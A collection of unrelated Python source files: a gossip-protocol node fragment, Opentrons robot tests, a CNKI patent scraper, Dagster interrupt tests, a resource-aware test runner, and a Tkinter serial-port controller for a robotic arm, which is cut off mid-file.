self.average = self.Node.Battery.battery_percent
self.Node.Battery.computational_energy +=self.Node.Battery.battery_drainer(self.Node.Battery.modemSleep_current, start)
def _update_mode(self):
'Update eager/lazy push modes'
start = time.monotonic_ns()/1000000
try:
self.netRatio = self.protocol_stats[3] / self.protocol_stats[1]
except:
self.netRatio = 1
if (self.Node.Battery.battery_percent >= self.average):
self.mode = "eager"
else:
self.mode = "lazy"
self.Node.Battery.computational_energy +=self.Node.Battery.battery_drainer(self.Node.Battery.modemSleep_current, start)
def _calc_tnext(self):
'Calculate tnext for a eager node'
start = time.monotonic_ns()/1000000
self.tnext = self.tmax
if self.mode == "eager":
if (self.bmax != self.bmin):
self.tnext = self.tmax - (self.tmax * (self.Node.Battery.battery_percent-self.bmin) / (self.bmax-self.bmin))
if self.tnext == 0:
self.tnext = 50
self.Node.Battery.computational_energy +=self.Node.Battery.battery_drainer(self.Node.Battery.modemSleep_current, start)
return self.tnext
def _get_ip(self,iface = 'eth0'):
'Gets ip address'
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sockfd = sock.fileno()
SIOCGIFADDR = 0x8915
ifreq = struct.pack('16sH14s', iface.encode('utf-8'), socket.AF_INET, b'\x00'*14)
try:
res = fcntl.ioctl(sockfd, SIOCGIFADDR, ifreq)
except:
traceback.print_exc()
return None
ip = struct.unpack('16sH2x4s8x', res)[2]
return socket.inet_ntoa(ip)
def _setup(self):
'Initial setup'
settings_file = open("settings.json","r").read()
settings = json.loads(settings_file)
self.tSinkMax = settings['sink_starvation']
self.fanout_max = settings['fan_out_max']
self.ttl = settings['ttl']
|
test_robot.py
|
import threading
import unittest
from unittest import mock
from opentrons.robot.robot import Robot
from opentrons.containers.placeable import Deck
from opentrons import instruments, containers
from opentrons.util.vector import Vector
class RobotTest(unittest.TestCase):
def setUp(self):
Robot.reset_for_tests()
self.robot = Robot.get_instance()
self.robot.reset()
self.robot.connect()
self.robot.home(enqueue=False)
def test_add_container(self):
c1 = self.robot.add_container('96-flat', 'A1')
res = self.robot.containers()
expected = {
'96-flat': c1
}
self.assertEquals(res, expected)
c2 = self.robot.add_container('96-flat', 'A2', 'my-special-plate')
res = self.robot.containers()
expected = {
'96-flat': c1,
'my-special-plate': c2
}
self.assertEquals(res, expected)
def test_comment(self):
self.robot.clear_commands()
self.robot.comment('hello')
self.assertEquals(len(self.robot.commands()), 1)
self.assertEquals(self.robot._commands[0].description, 'hello')
def test_home_after_disconnect(self):
self.robot.disconnect()
self.assertRaises(RuntimeError, self.robot.home)
def test_simulate(self):
self.robot.disconnect()
p200 = instruments.Pipette(axis='b', name='my-fancy-pancy-pipette')
p200.aspirate().dispense()
self.robot.simulate()
self.assertEquals(len(self.robot._commands), 2)
self.assertEquals(self.robot.connections['live'], None)
def test_stop_run(self):
p200 = instruments.Pipette(axis='b', name='my-fancy-pancy-pipette')
p200.calibrate_plunger(top=0, bottom=5, blow_out=6, drop_tip=7)
for i in range(1000):
p200.aspirate().dispense()
res = None
def _run():
nonlocal res
self.assertRaises(RuntimeError, self.robot.run)
thread = threading.Thread(target=_run)
thread.start()
self.robot.stop()
thread.join()
def test_exceptions_during_run(self):
p200 = instruments.Pipette(axis='b', name='my-fancy-pancy-pipette')
def _do():
return 'hello' / 3
p200.create_command(
do=_do,
enqueue=True)
self.assertRaises(RuntimeError, self.robot.run)
def test_calibrated_max_dimension(self):
expected = self.robot._deck.max_dimensions(self.robot._deck)
res = self.robot._calibrated_max_dimension()
self.assertEquals(res, expected)
p200 = instruments.Pipette(axis='b', name='my-fancy-pancy-pipette')
plate = containers.load('96-flat', 'A1')
self.robot.move_head(x=10, y=10, z=10)
p200.calibrate_position((plate, Vector(0, 0, 0)))
res = self.robot._calibrated_max_dimension()
expected = Vector(plate.max_dimensions(plate)) + Vector(10, 10, 10)
self.assertEquals(res, expected)
def test_create_arc(self):
p200 = instruments.Pipette(axis='b', name='my-fancy-pancy-pipette')
plate = containers.load('96-flat', 'A1')
plate2 = containers.load('96-flat', 'B1')
self.robot.move_head(x=10, y=10, z=10)
p200.calibrate_position((plate, Vector(0, 0, 0)))
self.robot.move_head(x=10, y=10, z=100)
p200.calibrate_position((plate2, Vector(0, 0, 0)))
res = self.robot._create_arc((0, 0, 0), plate[0])
expected = [
{'z': 100},
{'x': 0, 'y': 0},
{'z': 0}
]
self.assertEquals(res, expected)
res = self.robot._create_arc((0, 0, 0), plate[0])
expected = [
{'z': 20.5 + 5},
{'x': 0, 'y': 0},
{'z': 0}
]
self.assertEquals(res, expected)
def test_disconnect(self):
self.robot.disconnect()
res = self.robot.is_connected()
self.assertEquals(bool(res), False)
def test_get_connected_port(self):
res = self.robot.get_connected_port()
self.assertEquals(res, self.robot.VIRTUAL_SMOOTHIE_PORT)
def test_robot_move_to(self):
self.robot.move_to((Deck(), (100, 0, 0)))
self.robot.run()
position = self.robot._driver.get_head_position()['current']
self.assertEqual(position, (100, 0, 0))
def test_move_head(self):
self.robot.move_head(x=100, y=0, z=20)
current = self.robot._driver.get_head_position()['current']
self.assertEquals(current, (100, 0, 20))
def test_home(self):
self.robot.disconnect()
self.robot.connect()
self.assertDictEqual(self.robot.axis_homed, {
'x': False, 'y': False, 'z': False, 'a': False, 'b': False
})
self.robot.clear_commands()
self.robot.home('xa', enqueue=True)
self.assertDictEqual(self.robot.axis_homed, {
'x': False, 'y': False, 'z': False, 'a': False, 'b': False
})
self.assertEquals(len(self.robot._commands), 1)
self.robot.run()
self.assertDictEqual(self.robot.axis_homed, {
'x': True, 'y': False, 'z': False, 'a': True, 'b': False
})
self.robot.clear_commands()
self.robot.home(enqueue=False)
self.assertEquals(len(self.robot._commands), 0)
self.assertDictEqual(self.robot.axis_homed, {
'x': True, 'y': True, 'z': True, 'a': True, 'b': True
})
def test_robot_pause_and_resume(self):
self.robot.move_to((Deck(), (100, 0, 0)), enqueue=True)
self.robot.move_to((Deck(), (101, 0, 0)), enqueue=True)
self.assertEqual(len(self.robot._commands), 2)
self.robot.pause()
def _run():
self.robot.run()
thread = threading.Thread(target=_run)
thread.start()
self.robot.resume()
thread.join(0.5)
self.assertEquals(thread.is_alive(), False)
self.assertEqual(len(self.robot._commands), 2)
self.robot.clear_commands()
self.assertEqual(len(self.robot._commands), 0)
self.robot.move_to((Deck(), (100, 0, 0)), enqueue=True)
self.robot.move_to((Deck(), (101, 0, 0)), enqueue=True)
def _run():
self.robot.run()
self.robot.pause()
thread = threading.Thread(target=_run)
thread.start()
thread.join(0.01)
self.assertEquals(thread.is_alive(), True)
self.assertEqual(len(self.robot._commands) > 0, True)
self.robot.resume()
thread.join(1)
self.assertEqual(len(self.robot._commands), 2)
def test_versions(self):
res = self.robot.versions()
expected = {
'config': {
'version': 'v1.2.0',
'compatible': True
},
'firmware': {
'version': 'v1.0.5',
'compatible': True
},
'ot_version': {
'version': 'one_pro',
'compatible': True
}
}
self.assertDictEqual(res, expected)
def test_diagnostics(self):
res = self.robot.diagnostics()
expected = {
'axis_homed': {
'x': True, 'y': True, 'z': True, 'a': True, 'b': True
},
'switches': {
'x': False,
'y': False,
'z': False,
'a': False,
'b': False
},
'steps_per_mm': {
'x': 80.0,
'y': 80.0
}
}
self.assertDictEqual(res, expected)
self.robot.disconnect()
self.robot.connect()
self.assertRaises(RuntimeWarning, self.robot.move_head, x=-199)
res = self.robot.diagnostics()
expected = {
'axis_homed': {
'x': False, 'y': False, 'z': False, 'a': False, 'b': False
},
'switches': {
'x': True,
'y': False,
'z': False,
'a': False,
'b': False
},
'steps_per_mm': {
'x': 80.0,
'y': 80.0
}
}
self.assertDictEqual(res, expected)
self.robot.home('x', enqueue=False)
res = self.robot.diagnostics()
expected = {
'axis_homed': {
'x': True, 'y': False, 'z': False, 'a': False, 'b': False
},
'switches': {
'x': False,
'y': False,
'z': False,
'a': False,
'b': False
},
'steps_per_mm': {
'x': 80.0,
'y': 80.0
}
}
self.assertDictEqual(res, expected)
def test_get_motor_caching(self):
a_motor = self.robot.get_motor('a')
self.assertEqual(a_motor, self.robot.get_motor('a'))
b_motor = self.robot.get_motor('b')
self.assertEqual(b_motor, self.robot.get_motor('b'))
def test_get_mosfet_caching(self):
m0 = self.robot.get_mosfet(0)
self.assertEqual(m0, self.robot.get_mosfet(0))
m1 = self.robot.get_mosfet(1)
self.assertEqual(m1, self.robot.get_mosfet(1))
@mock.patch('requests.get')
@mock.patch('requests.post')
def test_send_to_app_with_unconfigured_robot(self, req_get, req_post):
def fake_get(url, data, headers):
res = mock.Mock()
res.ok = True
return res
def fake_post(*args, **kwargs):
res = mock.Mock()
res.ok = True
return res
req_get.side_effect = fake_get
req_post.side_effect = fake_post
self.robot.send_to_app()
self.assertTrue(req_get.called)
self.assertTrue(req_post.called)
@mock.patch('requests.get')
@mock.patch('requests.post')
def test_send_to_app_with_configured_robot(self, req_get, req_post):
def fake_get(url, data, headers):
res = mock.Mock()
res.ok = True
return res
def fake_post(*args, **kwargs):
res = mock.Mock()
res.ok = True
return res
plate = containers.load('96-flat', 'A1')
p200 = instruments.Pipette(axis='b', max_volume=200)
for well in plate:
p200.aspirate(well).delay(5).dispense(well)
req_get.side_effect = fake_get
req_post.side_effect = fake_post
self.robot.send_to_app()
self.assertTrue(req_get.called)
self.assertTrue(req_post.called)
|
Spider_Lv3.py
|
# -*- coding: utf-8 -*-
# Spider Lv3
# Author: Yue H.W. Luo
# Mail: yue.rimoe@gmail.com
# License : http://www.apache.org/licenses/LICENSE-2.0
# More detial: https://blog.rimoe.xyz/2017/11/12/post01/
"""
## NOTE
Created on Thu Oct 26 15:30:04 2017
This programme is used to get data from cnik-database.
`threading`, `selenium` and `requests` module is needed.
## Reference:
> http://cuiqingcai.com/2599.html
> http://cuiqingcai.com/2621.html
===============================================================================
rimoerimoerimoe sysu sysu rimoerimoerimoe sysu sysu
rimoerimoerimoe sysu sysu rimoerimoerimoe sysu sysu
yue sysu sysu yue sysu sysu
yue sysu sysu yue sysu sysu
rimoerimoerimoe sysu sysu rimoerimoerimoe sysu sysu
rimoerimoerimoe sysu sysu rimoerimoerimoe sysu sysu
yue rimoe yue sysu sysu
yue rimoe yue sysu sysu
yue rimoe yue sysu sysu
rimoerimoerimoe rimoe rimoerimoerimoe rimoerimoerimoe
rimoerimoerimoe rimoe rimoerimoerimoe rimoerimoerimoe
===============================================================================
93rd Anniversary,
Happy birthday!
"""
import re
import time
import requests
import threading
from selenium import webdriver
from selenium.webdriver.support.select import Select
from selenium.common.exceptions import NoSuchElementException
class Spider:
def __init__(self, dp, url):
self.data_path = dp
self.url = url
self.dlist = []
self.html = ''
self.string = ''
self.todo = ['申请号', '申请日', '公开号', '公开日', '申请人',
'地址', '共同申请人', '发明人', '国际申请', '国际公布',
'进入国家日期', '专利代理机构', '代理人', '分案原申请号',
'国省代码', '摘要', '主权项', '页数', '主分类号',
'专利分类号']
self.driver = webdriver.Chrome()
# Search: controling the webdriver via selenium
def search(self, search_whe, search_key, search_type):
driver = self.driver
driver.get(self.url)
time.sleep(5)
inbox = driver.find_element_by_xpath('//*[@id="Text1"]')
buton = driver.find_element_by_xpath(
'//*[@id="Table6"]/tbody/tr[1]/td[3]/table/tbody/tr/td/input')
where = driver.find_element_by_xpath('//*[@id="Select1"]')
pages = driver.find_element_by_xpath(
'//*[@id="Table8"]/tbody/tr/td/select[3]')
types = [
driver.find_element_by_xpath('//*[@id="专利类别1"]'), # 专利发明
driver.find_element_by_xpath('//*[@id="专利类别2"]'), # 外观设计
driver.find_element_by_xpath('//*[@id="专利类别3"]') # 实用新型
]
inbox.clear()
inbox.send_keys(search_key)
for t in types:
t.click()
types[search_type].click()
Select(pages).select_by_value('50')
Select(where).select_by_value(search_whe)
time.sleep(5)
buton.click()
# Get url: get the url list
def get_site(self):
driver = self.driver
try:
next = driver.find_element_by_xpath(
'//*[@id="id_grid_turnpage2"]/a[1]')
except NoSuchElementException:
global search_whe, search_key, search_type
time.sleep(5)
self.search(search_whe, search_key, search_type)
pattern = re.compile(r'(.*?)&QueryID=\d+&CurRec=\d')
while 1:
i = 1
while 1:
i += 1
try:
a = driver.find_element_by_xpath(
'//*[@id="contentBox"]/table/tbody/tr[%s]/td[2]/a' % i)
except:
break
txt = a.get_attribute("href")
txt = re.findall(pattern, txt)[0]
self.dlist.append(txt)
print('Thread 1: ' + txt)
next.click()
next = driver.find_element_by_xpath(
'//*[@id="id_grid_turnpage2"]/a[3]')
self.close()
# Get the infomation
def get_data(self):
save_name = 'save.txt'
with open(self.data_path + '\\' + save_name, 'a') as sf:
self.string = '名称,' + ','.join(self.todo)
sf.write(self.string + '\n')
while 1:
try:
p = self.dlist.pop(0)
except IndexError:
print('Thread 2: ' + 'List has noting.')
time.sleep(2)
continue
self.html = requests.get(p).text.encode('utf-8')
with open(self.data_path + '\\' + save_name, 'a') as sf:
self.analyse()
print('Thread 2: ' + self.string)
sf.write(self.string + '\n')
# Get each record by using regular expressions
def get_(self, pattern):
pattern = re.compile(r'【' + pattern + '】.*?nbsp;(.*?)<', re.S)
try:
s = re.findall(pattern, self.html)[0]
s = s.replace('\r', '').replace('\n', '').replace('\t', '')
self.string += '"' + s + '",'
except IndexError:
self.string += ' ,'
def analyse(self):
pattern = re.compile(r'<title>(.*?)--', re.S)
try:
self.string = re.findall(pattern, self.html)[0] + ','
except IndexError:
self.string = ' ,'
for i in self.todo:
self.get_(i)
self.string.strip(',')
def close(self):
self.driver.close()
data_path = r'C:\Users\Jack\Desktop'
search_whe = u'地址'
search_key = u'东莞'
search_type = 0
url = 'http://dbpub.cnki.net/grid2008/dbpub/brief.aspx?id=scpd'
spider = Spider(data_path, url)
spider.search(search_whe, search_key, search_type)
threads = []
t1 = threading.Thread(target=spider.get_site, args=())
threads.append(t1)
t2 = threading.Thread(target=spider.get_data, args=())
threads.append(t2)
for t in threads:
t.setDaemon(True)
t.start()
|
test_interrupt.py
|
import os
import time
from threading import Thread
import pytest
from dagster import (
DagsterEventType,
DagsterSubprocessError,
Field,
ModeDefinition,
String,
execute_pipeline_iterator,
pipeline,
reconstructable,
resource,
seven,
solid,
)
from dagster.core.instance import DagsterInstance
from dagster.utils import safe_tempfile_path
def _send_kbd_int(temp_files):
while not all([os.path.exists(temp_file) for temp_file in temp_files]):
time.sleep(0.1)
seven.thread.interrupt_main()
@solid(config_schema={'tempfile': Field(String)})
def write_a_file(context):
with open(context.solid_config['tempfile'], 'w') as ff:
ff.write('yup')
while True:
time.sleep(0.1)
@solid
def should_not_start(_context):
assert False
@pipeline
def write_files_pipeline():
write_a_file.alias('write_1')()
write_a_file.alias('write_2')()
write_a_file.alias('write_3')()
write_a_file.alias('write_4')()
should_not_start.alias('x_should_not_start')()
should_not_start.alias('y_should_not_start')()
should_not_start.alias('z_should_not_start')()
def test_interrupt():
@pipeline
def write_a_file_pipeline():
write_a_file()
with safe_tempfile_path() as success_tempfile:
# launch a thread the waits until the file is written to launch an interrupt
Thread(target=_send_kbd_int, args=([success_tempfile],)).start()
results = []
try:
# launch a pipeline that writes a file and loops infinitely
# next time the launched thread wakes up it will send a keyboard
# interrupt
for result in execute_pipeline_iterator(
write_a_file_pipeline,
run_config={'solids': {'write_a_file': {'config': {'tempfile': success_tempfile}}}},
):
results.append(result.event_type)
assert False # should never reach
except KeyboardInterrupt:
pass
assert DagsterEventType.STEP_FAILURE in results
assert DagsterEventType.PIPELINE_FAILURE in results
# https://github.com/dagster-io/dagster/issues/1970
@pytest.mark.skip
def test_interrupt_multiproc():
with seven.TemporaryDirectory() as tempdir:
file_1 = os.path.join(tempdir, 'file_1')
file_2 = os.path.join(tempdir, 'file_2')
file_3 = os.path.join(tempdir, 'file_3')
file_4 = os.path.join(tempdir, 'file_4')
# launch a thread the waits until the file is written to launch an interrupt
Thread(target=_send_kbd_int, args=([file_1, file_2, file_3, file_4],)).start()
results = []
try:
# launch a pipeline that writes a file and loops infinitely
# next time the launched thread wakes up it will send a keyboard
# interrupt
for result in execute_pipeline_iterator(
reconstructable(write_files_pipeline),
run_config={
'solids': {
'write_1': {'config': {'tempfile': file_1}},
'write_2': {'config': {'tempfile': file_2}},
'write_3': {'config': {'tempfile': file_3}},
'write_4': {'config': {'tempfile': file_4}},
},
'execution': {'multiprocess': {'config': {'max_concurrent': 4}}},
'storage': {'filesystem': {}},
},
instance=DagsterInstance.local_temp(tempdir=tempdir),
):
results.append(result)
assert False # should never reach
except (DagsterSubprocessError, KeyboardInterrupt):
pass
assert [result.event_type for result in results].count(DagsterEventType.STEP_FAILURE) == 4
assert DagsterEventType.PIPELINE_FAILURE in [result.event_type for result in results]
def test_interrupt_resource_teardown():
called = []
cleaned = []
@resource
def resource_a(_):
try:
called.append('A')
yield 'A'
finally:
cleaned.append('A')
@solid(config_schema={'tempfile': Field(String)}, required_resource_keys={'a'})
def write_a_file_resource_solid(context):
with open(context.solid_config['tempfile'], 'w') as ff:
ff.write('yup')
while True:
time.sleep(0.1)
@pipeline(mode_defs=[ModeDefinition(resource_defs={'a': resource_a})])
def write_a_file_pipeline():
write_a_file_resource_solid()
with safe_tempfile_path() as success_tempfile:
# launch a thread the waits until the file is written to launch an interrupt
Thread(target=_send_kbd_int, args=([success_tempfile],)).start()
results = []
try:
# launch a pipeline that writes a file and loops infinitely
# next time the launched thread wakes up it will send a keyboard
# interrupt
for result in execute_pipeline_iterator(
write_a_file_pipeline,
run_config={
'solids': {
'write_a_file_resource_solid': {'config': {'tempfile': success_tempfile}}
}
},
):
results.append(result.event_type)
assert False # should never reach
except KeyboardInterrupt:
pass
assert DagsterEventType.STEP_FAILURE in results
assert DagsterEventType.PIPELINE_FAILURE in results
assert 'A' in cleaned
|
main.py
|
from math import floor
from multiprocessing import Process
import time
import psutil
import test_group
import random
from dotenv import dotenv_values
PARALLEL = True
test_processes = []
def try_seed_random():
config = dotenv_values('.env')
if 'SEED' in config:
random.seed(config['SEED'])
def is_cpu_available():
child_processes = psutil.Process().children(recursive=True)
our_cpu_usage = sum([process.cpu_percent(interval=0.1) for process in child_processes]) / psutil.cpu_count() / 100
total_cpu_usage = psutil.cpu_percent(interval=0.2) / 100
other_cpu_usage = total_cpu_usage - our_cpu_usage
our_max_cpu_usage = 0.5 * (1-other_cpu_usage)
cpu_bound = floor(psutil.cpu_count() * our_max_cpu_usage)
print('Our CPU usage:', our_cpu_usage, 'total usage:', total_cpu_usage, 'other usage:', other_cpu_usage, 'our max usage:', our_max_cpu_usage, 'our bound:', cpu_bound)
return cpu_bound > len(test_processes)
def is_memory_available():
total_memory_used = psutil.virtual_memory().percent / 100
child_processes = psutil.Process().children(recursive=True)
our_usage_percentage = sum([process.memory_percent() for process in child_processes]) / 100
other_processes_usage = total_memory_used - our_usage_percentage
our_usable = 0.3 * (1-other_processes_usage)
print('Our memory usage:', our_usage_percentage, 'total usage:', total_memory_used, 'other usage:', other_processes_usage, 'our usable:', our_usable)
return our_usage_percentage < our_usable
def resources_available():
print('Running processes currently: ' + str(len(test_processes)))
return is_memory_available() and is_cpu_available()
def spawn_test_run(game_ingredients):
new_process = Process(target=test_group.play_and_save, args=game_ingredients)
new_process.start()
print('Spawned new process:', new_process.pid)
test_processes.append(new_process)
def clean_finished_processes():
for process in test_processes:
if not process.is_alive():
print('Process', process.pid, 'finished')
process.join()
test_processes.remove(process)
if __name__ == '__main__':
try_seed_random()
if not PARALLEL:
for game_ingredients in test_group.build_game_instances():
test_group.play_and_save(*game_ingredients)
else:
game_generator = test_group.build_game_instances()
sleep_time = 30
tests_done = False
while not tests_done or len(test_processes) > 0:
clean_finished_processes()
# If there are resources, reduce the sleep time a bit, and vice versa.
if not tests_done and resources_available():
sleep_time *= 0.93
try:
game_ingredients = next(game_generator)
spawn_test_run(game_ingredients)
except StopIteration:
tests_done = True
else:
sleep_time /= 0.93
sleep_time = max(5, min(sleep_time, 90))
# It can take a while for the memory consumption to settle, so let's wait a bit.
time.sleep(sleep_time)
|
serial_port.py
|
# -*- coding: utf-8 -*-
"""
Created on Tues Aug 3 17:06:02 2021
@author: wmy and wjx
"""
import four_dof_ik
import serial
import serial.tools.list_ports
import threading
import tkinter as tk
from tkinter import messagebox
from tkinter import ttk
import time
ifwork = True
def write_coordinates(filename, offset):
try:
f = open(filename, "w")
f.write(offset)
f.close()
except:
time.sleep(0.1)
def get_coordinates(filename):
try:
f = open(filename)
data = f.read()
num = data.split(',')
f.close()
return [int(num[0]), int(num[1]), int(num[2])]
except:
time.sleep(0.1)
class SerialPortAssistant(object):
def __init__(self):
self.serial = serial.Serial()
self.device = None
self.baudrate = 9600
self.encoding = "gb2312"
self.recthread = None
self.connecting = False
self.comports = []
self.devices = []
self.search()
self.interface()
self.updatethread = threading.Thread(target=self.update)
self.updatethread.start()
self.angle0 = 1500
pass
def interface(self):
self.root = tk.Tk()
self.root.title('机械臂串口助手 V0.0.1')
self.root.geometry('960x640')
self.face = tk.Frame(self.root)
self.face.config(height=640, width=960)
self.face.propagate(False)
self.face.pack(anchor='nw')
# operate frame
operateframe = tk.Frame(self.face)
operateframe.config(height=220, width=960)
operateframe.propagate(False)
operateframe.pack(anchor='nw', side='bottom')
operatespaceframe = tk.Frame(operateframe)
operatespaceframe.config(height=220, width=10)
operatespaceframe.propagate(False)
operatespaceframe.pack(anchor='nw', side='left')
# send text
operatetextframe = tk.Frame(operateframe)
operatetextframe.config(height=220, width=725)
operatetextframe.propagate(False)
operatetextframe.pack(anchor='nw', side='left')
operatespaceframe = tk.Frame(operatetextframe)
operatespaceframe.config(height=10, width=725)
operatespaceframe.propagate(False)
operatespaceframe.pack(anchor='nw', side='top')
operatespaceframe = tk.Frame(operatetextframe)
operatespaceframe.config(height=10, width=725)
operatespaceframe.propagate(False)
operatespaceframe.pack(anchor='sw', side='bottom')
# operate right
operateframeright = tk.Frame(operateframe)
operateframeright.config(height=240, width=210)
operateframeright.propagate(False)
operateframeright.pack(anchor='nw', side='left')
# send botton
spacelabel = tk.Label(operateframeright, width=5, height=1)
spacelabel.pack()
self.sendbutton = tk.Button(operateframeright, text='发送坐标', \
width=20, height=1, command=self.sendbuttoncmd)
self.sendbutton.pack(side='top')
# text
self.sendtext = tk.Text(operatetextframe, height=15, width=99, bg='white', fg="black")
self.sendscrollbar = tk.Scrollbar(operatetextframe)
self.sendtext['yscrollcommand'] = self.sendscrollbar.set
self.sendscrollbar['command'] = self.sendtext.yview
self.sendtext.pack(side=tk.LEFT)
self.sendscrollbar.pack(side='left', fill=tk.Y)
# space frame
spaceframe = tk.Frame(self.face)
spaceframe.config(height=420, width=10)
spaceframe.propagate(False)
spaceframe.pack(anchor='nw', side='left')
# text frame
textframe = tk.Frame(self.face)
textframe.config(height=420, width=725)
textframe.propagate(False)
textframe.pack(anchor='nw', side='left')
# option frame
optionframe = tk.Frame(self.face)
optionframe.config(height=420., width=225)
optionframe.propagate(False)
optionframe.pack(anchor='ne', side='right')
# text
self.rectext = tk.Text(textframe, height=35, width=99, bg='black', fg="#00FF00")
self.recscrollbar = tk.Scrollbar(textframe)
self.rectext['yscrollcommand'] = self.recscrollbar.set
self.rectext.config(state=tk.DISABLED)
self.recscrollbar['command'] = self.rectext.yview
self.rectext.pack(side=tk.LEFT, fill=tk.BOTH)
self.recscrollbar.pack(side='left', fill=tk.Y)
# option
optionframebottom = tk.Frame(optionframe)
optionframebottom.config(height=150., width=210)
optionframebottom.propagate(False)
optionframebottom.pack(anchor='sw', side='bottom')
# left
optionframeleft = tk.Frame(optionframe)
optionframeleft.config(height=420., width=60)
optionframeleft.propagate(False)
optionframeleft.pack(anchor='nw', side='left')
# right
optionframeright = tk.Frame(optionframe)
optionframeright.config(height=420., width=150)
optionframeright.propagate(False)
optionframeright.pack(anchor='nw', side='left')
# serial
spacelabel = tk.Label(optionframeleft, width=5, height=1)
spacelabel.pack()
label1 = tk.Label(optionframeleft, text="端口号", width=5, height=1)
label1.pack()
spacelabel = tk.Label(optionframeright, width=5, height=1)
spacelabel.pack()
self.serialselect = ttk.Combobox(optionframeright, width=15, height=5)
self.serialselect.bind("<<ComboboxSelected>>", self.serialselectcmd)
self.serialselect.pack()
# baudrate
spacelabel = tk.Label(optionframeleft, width=5, height=1)
spacelabel.pack()
label2 = tk.Label(optionframeleft, text="波特率", width=5, height=1)
label2.pack()
spacelabel = tk.Label(optionframeright, width=5, height=1)
spacelabel.pack()
self.baudrateselect = ttk.Combobox(optionframeright, width=15, height=8)
self.baudrateselect.bind("<<ComboboxSelected>>", self.baudrateselectcmd)
self.baudrateselect['value'] = [1382400, 921600, 460800, 256000, 230400, \
128000, 115200, 76800, 57600, 43000, 38400, 19200, 14400, \
9600, 4800, 2400, 1200]
self.baudrateselect.current(13)
self.baudrateselect.pack()
# cal bit
spacelabel = tk.Label(optionframeleft, width=5, height=1)
spacelabel.pack()
label3 = tk.Label(optionframeleft, text="校验位", width=5, height=1)
label3.pack()
spacelabel = tk.Label(optionframeright, width=5, height=1)
spacelabel.pack()
self.calbitselect = ttk.Combobox(optionframeright, width=15, height=8)
self.calbitselect['value'] = ["无校验", "奇校验", "偶校验"]
self.calbitselect.current(0)
self.calbitselect.pack()
# data bit
spacelabel = tk.Label(optionframeleft, width=5, height=1)
spacelabel.pack()
label4 = tk.Label(optionframeleft, text="数据位", width=5, height=1)
label4.pack()
spacelabel = tk.Label(optionframeright, width=5, height=1)
spacelabel.pack()
self.databitselect = ttk.Combobox(optionframeright, width=15, height=8)
self.databitselect['value'] = [8, 7, 6, 5]
self.databitselect.current(0)
self.databitselect.pack()
# stop bit
spacelabel = tk.Label(optionframeleft, width=5, height=1)
spacelabel.pack()
label5 = tk.Label(optionframeleft, text="停止位", width=5, height=1)
label5.pack()
spacelabel = tk.Label(optionframeright, width=5, height=1)
spacelabel.pack()
self.stopbitselect = ttk.Combobox(optionframeright, width=15, height=8)
self.stopbitselect['value'] = [1]
self.stopbitselect.current(0)
self.stopbitselect.pack()
# check
# self.hexdisplay = tk.BooleanVar()
# self.hexdisplaycheck = tk.Checkbutton(optionframebottom, text='十六进制显示', \
# onvalue=True, offvalue=False, variable=self.hexdisplay)
# self.hexdisplaycheck.pack()
# open
spacelabel = tk.Label(optionframebottom, width=5, height=1)
spacelabel.pack()
self.openbutton = tk.Button(optionframebottom, text='打开串口', \
width=20, height=1, command=self.openbuttoncmd)
self.openbutton.pack()
# remote
spacelabel = tk.Label(optionframebottom, width=5, height=1)
spacelabel.pack()
self.remotebutton = tk.Button(optionframebottom, text='开始遥控', \
width=20, height=1, command=self.remotebuttoncmd)
self.remotebutton.pack()
# clear
spacelabel = tk.Label(optionframebottom, width=5, height=1)
spacelabel.pack()
self.runbutton = tk.Button(optionframebottom, text='开始抓取', \
width=20, height=1, command=self.runbuttoncmd)
self.runbutton.pack()
pass
def baudrateselectcmd(self, *args):
self.baudrate = int(self.baudrateselect.get())
self.serial.baudrate = self.baudrate
print(self.baudrate)
pass
def serialselectcmd(self, *args):
self.device = self.serialselect.get().split()[0]
self.serial.port = self.device
print(self.device)
pass
def search(self):
self.devices = []
self.comports = list(serial.tools.list_ports.comports())
for comport in self.comports:
self.devices.append(comport.device)
pass
pass
def update(self):
while True:
if self.connecting == False:
self.search()
self.serialselect['value'] = self.comports
if len(list(self.serialselect['value'])) == 0:
self.serialselect['value'] = [""]
self.serialselect.current(0)
self.device = None
pass
elif self.device == None or self.device not in self.devices:
self.serialselect.current(0)
self.device = self.devices[0]
pass
self.serialselect.update()
self.face.update_idletasks()
pass
pass
pass
def serialopen(self):
self.serial.port = self.device
self.serial.baudrate = self.baudrate
self.serial.timeout = 2
try:
self.serialclose()
time.sleep(0.1)
self.serial.open()
except Exception as error:
tk.messagebox.showinfo(title='无法连接到串口', message=error)
return False
else:
if self.serial.isOpen():
self.connecting = True
# self.recthread = threading.Thread(target=self.receive)
# self.recthread.start()
return True
else:
return False
pass
pass
def serialclose(self):
self.connecting = False
time.sleep(0.1)
self.serial.close()
pass
def receive(self):
while self.connecting:
try:
nchar = self.serial.inWaiting()
pass
except:
self.connecting = False
self.serialclose()
self.openbutton['text'] = '打开串口'
pass
if nchar:
if self.hexdisplay.get() == False:
data = ''.encode('utf-8')
data = data + self.serial.read(nchar)
try:
self.rectext.config(state=tk.NORMAL)
self.rectext.insert(tk.END, data.decode(self.encoding))
self.rectext.config(state=tk.DISABLED)
self.rectext.yview_moveto(1)
self.rectext.update()
pass
except:
pass
pass
else:
data = self.serial.read(nchar)
convert = '0123456789ABCDEF'
string = ''
for char in data:
string += convert[char // 16] + convert[char % 16] + ' '
pass
self.rectext.config(state=tk.NORMAL)
self.rectext.insert(tk.END, string)
self.rectext.config(state=tk.DISABLED)
self.rectext.yview_moveto(1)
self.rectext.update()
pass
pass
pass
pass
def run(self):
self.root.mainloop()
self.exit()
pass
def exit(self):
self.serialclose()
pass
# 按钮
def openbuttoncmd(self):
if self.openbutton['text'] == '打开串口':
is_open = self.serialopen()
if is_open:
self.openbutton['text'] = '关闭串口'
self.restoration()
time.sleep(0.5)
pass
pass
else:
self.restoration()
self.serialclose()
self.openbutton['text'] = '打开串口'
pass
pass
def remotebuttoncmd(self):
if self.remotebutton['text'] == '开始遥控':
self.root.bind("<Key>", self.func1)
self.remotebutton['text'] = '结束遥控'
else:
self.root.unbind("<Key>")
self.remotebutton['text'] = '开始遥控'
def runbuttoncmd(self):
global ifwork
if self.runbutton['text'] == '开始抓取':
t1 = threading.Thread(target=self.working)
t1.start()
ifwork = True
self.runbutton['text'] = '结束抓取'
else:
ifwork = False
self.runbutton['text'] = '开始抓取'
def sendbuttoncmd(self):
if self.connecting:
data = self.sendtext.get(1.0, tk.END)
num = data.split(',')
num = list(map(int, num))
self.robotrun(num)
else:
tk.messagebox.showinfo(title='无法发送', message='请先打开串口')
pass
pass
# 键盘事件
